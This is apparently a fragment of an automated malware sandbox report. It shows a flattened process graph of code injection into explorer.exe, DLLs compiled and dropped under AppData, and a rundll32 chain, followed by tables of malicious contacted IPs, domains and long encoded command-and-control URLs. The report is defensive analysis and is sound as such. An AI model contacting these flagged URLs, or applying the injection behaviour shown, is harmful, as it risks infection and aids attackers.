20->101 36 explorer.exe 23->36 injected 71 C:\Users\user\AppData\...\senxb4p4.cmdline, UTF-8 25->71 dropped 103 Compiles code for process injection (via .Net compiler) 25->103 105 Creates a thread in another existing process (thread injection) 25->105 38 csc.exe 25->38         started        41 csc.exe 25->41         started        43 conhost.exe 25->43         started        73 C:\Users\user\AppData\Local\...\vbpfsg54.0.cs, UTF-8 28->73 dropped 45 csc.exe 28->45         started        47 csc.exe 28->47         started        49 conhost.exe 28->49         started        signatures9 process10 dnsIp11 75 gtr.antoinfer.com 32->75 77 192.168.2.1 unknown unknown 32->77 87 System process connects to network (likely due to code injection or exploit) 32->87 89 Writes to foreign memory regions 32->89 51 control.exe 32->51         started        63 C:\Users\user\AppData\Local\...\senxb4p4.dll, PE32 38->63 dropped 53 cvtres.exe 38->53         started        65 C:\Users\user\AppData\Local\...\fedhsvoj.dll, PE32 41->65 dropped 55 cvtres.exe 41->55         started        67 C:\Users\user\AppData\Local\...\jqkof1ka.dll, PE32 45->67 dropped 57 cvtres.exe 45->57         started        69 C:\Users\user\AppData\Local\...\vbpfsg54.dll, PE32 47->69 dropped 59 cvtres.exe 47->59         started        file12 signatures13 process14 process15 61 rundll32.exe 51->61         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.228.233.17
 gtr.antoinfer.com Russian Federation
64439 ITOS-ASRU true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
gtr.antoinfer.com 185.228.233.17 true
resolver1.opendns.com 208.67.222.222 true
app.flashgameo.at 185.228.233.17 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gtr.antoinfer.com/FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F true
  • Avira URL Cloud: malware
 unknown
http://gtr.antoinfer.com/08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw true
  • Avira URL Cloud: malware
 unknown
http://gtr.antoinfer.com/mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8 true
  • Avira URL Cloud: malware
 unknown
http://gtr.antoinfer.com/DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE true
  • Avira URL Cloud: malware
 unknown